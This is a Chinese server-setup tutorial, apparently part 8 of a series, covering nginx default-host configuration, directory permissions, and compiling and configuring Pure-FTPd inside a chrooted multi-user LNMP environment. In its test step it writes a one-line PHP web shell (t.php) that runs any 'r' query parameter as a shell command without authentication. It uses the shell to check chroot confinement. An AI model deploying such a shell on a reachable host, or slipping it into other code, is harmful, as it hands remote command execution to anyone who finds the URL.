lnmp多用户安全运行环境(chroot)(8)
4、创建默认虚拟主机
# Write the catch-all (default) virtual host for nginx on ports 80 and 8080.
# The heredoc delimiter is quoted, so the nginx variables and regex anchors
# below are written literally and need no backslash escaping.
#
# NOTE(review): "location ~* \.php" has no end anchor, so any URI that merely
# contains ".php" is handed to PHP-FPM on 127.0.0.1:9001. Whether a non-PHP
# upload could be interpreted that way depends on fastcgi.inc and on
# cgi.fix_pathinfo, neither of which is shown here -- confirm before use.
# NOTE(review): the "?" after the extension group in the deny rule makes the
# group optional, so that rule also matches URIs ending in a bare "." --
# verify this is intended.
cat >/usr/local/nginx/conf/vhosts/default.conf <<'EOF'
server {
listen 80 default;
listen 8080 default;
server_name _;
access_log /var/log/nginx/default-access.log combined;
error_log /var/log/nginx/default-error.log;
root /var/www/html;
index index.html index.htm index.php;
charset utf-8;
include fastcgi_purge_cache.inc;
if (-d $request_filename){
rewrite ^/(.*)([^/])$ $scheme://$host/$1$2/ permanent;
}
#include /var/www/html/nginx.conf;
location / {
rewrite ^/$ http://www.google.com/ncr permanent;
}
error_page 404 http://www.google.com/ncr;
location ~* \.php {
fastcgi_pass 127.0.0.1:9001;
fastcgi_index index.php;
include fastcgi.inc;
include fastcgi_cache.inc;
#fastcgi_param HTTPS on;
}
location ~* \.(ftpquota|htaccess|htpasswd|asp|aspx|jsp|asa|mdb)?$ {
deny all;
}
}
EOF
5、杂项,修改配置路径及日志路径的目录权限
# Tighten the nginx configuration tree: regular files 0640, directories 0750.
# "-exec ... {} +" hands the paths to chmod in batches instead of one per call.
find /usr/local/nginx/conf/ -type f -exec chmod 0640 {} +
find /usr/local/nginx/conf/ -type d -exec chmod 0750 {} +
# Log directory: owner full access, group read/traverse, nothing for "other".
chmod 0750 /var/log/nginx
6、测试
启动php-fpm和nginx,然后建立第一个网站路径
# Start PHP-FPM first, then nginx, so the FastCGI backend is already
# listening when the web server begins accepting requests.
for svc in php-fpm nginx; do
  service "$svc" start
done
写个输出phpinfo的php
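# Drop a phpinfo() page into the default docroot to confirm PHP-FPM answers.
# The heredoc delimiter is quoted so the PHP source is written verbatim. The
# opening tag must be exactly "<?php" (no space after "<"), otherwise PHP
# does not recognise it and the file is sent back as plain text.
# phpinfo() output lists paths, loaded modules and environment values, so
# delete the file once the check is done.
cat > /var/www/html/phpinfo.php <<'EOF'
<?php
phpinfo();
?>
EOF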
或者可以传个小马上来测试,比如下面这个一句话小马
# Test script: it takes the "r" query parameter and runs it through PHP's
# backtick operator, echoing the command output. Presumably used here to
# confirm that commands started by PHP-FPM only see the chroot.
# NOTE(review): this gives command execution, without authentication, to
# anyone who can reach the URL. Use it only on a host that is not reachable
# from untrusted networks, and delete t.php as soon as the confinement check
# is finished.
cat > /var/www/html/t.php <<EOF
< ?php
\$run = \$_GET['r'];
echo \`\$run\`;
?>
EOF
打开浏览器,直接用小马探测下
比如执行pwd命令 http://ip/t.php?r=pwd
再比如执行ls命令 http://ip/t.php?r=ls
六、编译ftp软件Pure-FTPD,鉴权直接使用系统passwd,如果要配合其他程序,建议修改为mysql鉴权
1、开始编译
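# Fetch, build and install Pure-FTPd 1.0.36 under /usr/local/pureftpd.
# The steps are chained with && so a failed download, configure or build
# stops the sequence instead of installing from a stale or partial tree.
#
# NOTE(review): the tarball is fetched over plain HTTP and is never verified.
# Check it against the publisher's signature or checksum before building.
cd /usr/local/src/ &&
  wget http://download.pureftpd.org/pub/pure-ftpd/releases/pure-ftpd-1.0.36.tar.gz &&
  tar -zxvf pure-ftpd-1.0.36.tar.gz &&
  cd pure-ftpd-1.0.36/ &&
  ./configure --prefix=/usr/local/pureftpd \
    --with-puredb --with-shadow --with-pam \
    --with-paranoidmsg --with-welcomemsg --with-uploadscript \
    --with-cookie --with-virtualchroot --with-virtualhosts \
    --with-diraliases --with-quotas --with-sysquotas --with-ratios \
    --with-ftpwho --with-throttling --with-tls --with-rfc2640 \
    --with-bonjour &&
  make &&
  make install &&
  # Helper script that turns pure-ftpd.conf into command-line options.
  /usr/bin/install -m 755 configuration-file/pure-config.pl /usr/local/pureftpd/sbin/pure-config.pl &&
  # Paths are listed explicitly so the line does not depend on brace expansion.
  mkdir -p /usr/local/pureftpd/etc/ /var/ftp &&
  /usr/bin/install -m 644 configuration-file/pure-ftpd.conf /usr/local/pureftpd/etc/pure-ftpd.conf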
2、创建开机启动init脚本
# Install the Red Hat init script from the source tree as the "pureftpd"
# service. The source path is relative, so this must be run from inside the
# pure-ftpd source directory.
/usr/bin/install -m 755 contrib/redhat.init /etc/rc.d/init.d/pureftpd
# Register the service with chkconfig and enable it for runlevels 2-5.
chkconfig --add pureftpd
chkconfig --level 2345 pureftpd on
3、修改Pure-FTPD配置
# Edit the installed pure-ftpd.conf in place. Every change is addressed by
# line number, so it only hits the intended directive if the file is the
# unmodified one copied from the 1.0.36 source tree.
# TODO confirm: review the resulting lines before starting the daemon.
# Lines 143 and 180: remove the first "# " (presumably uncommenting a directive).
sed -i '143 s/# //' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '180 s/# //' /usr/local/pureftpd/etc/pure-ftpd.conf
# Line 246: change the first "no" to "yes".
sed -i '246 s/no/yes/' /usr/local/pureftpd/etc/pure-ftpd.conf
# Lines 336 and 351: remove the first "#".
sed -i '336 s/#//' /usr/local/pureftpd/etc/pure-ftpd.conf
sed -i '351 s/#//' /usr/local/pureftpd/etc/pure-ftpd.conf
为FTP用户设置umask值
# Line 234: replace the umask pair 133:022 with 173:072 ("#" is the sed
# delimiter here).
# NOTE(review): if this line is Pure-FTPd's Umask directive (<files>:<dirs>),
# uploads end up as 0604 files and 0705 directories: no group access, but
# still readable by "other". Confirm that matches the intended per-user
# isolation.
sed -i '234 s#133:022#173:072#' /usr/local/pureftpd/etc/pure-ftpd.conf
4、创建软链接及密码文件
# Expose the Pure-FTPd tools and configuration under the usual system paths.
# With a directory as the final argument, ln names each link after its target.
ln -s /usr/local/pureftpd/sbin/pure-config.pl /usr/local/pureftpd/sbin/pure-ftpwho /usr/local/sbin/
ln -s /usr/local/pureftpd/bin/pure-pw /usr/local/bin/
ln -s /usr/local/pureftpd/etc/pure-ftpd.conf /etc/
5、杂项,将日志从系统syslog中剥离开来
# Line 42 of rsyslog.conf: append ";ftp.none" after "cron.none", presumably
# on the catch-all selector so FTP messages stop going to the general log.
# The edit is addressed by line number -- TODO confirm it hit the intended rule.
sed -i '42 s/cron.none/cron.none;ftp.none/' /etc/rsyslog.conf
# Route everything from the ftp facility to its own file. The leading "-"
# tells rsyslog not to sync the file after every message.
echo "ftp.* -/var/log/pureftpd.log" >> /etc/rsyslog.conf
# Reload rsyslog so the new rules take effect.
service rsyslog restart
七、最后启用所有服务
# Bring up the whole stack in dependency order: database, PHP-FPM, web
# server, then the FTP daemon.
for svc in mysqld php-fpm nginx pureftpd; do
  service "$svc" start
done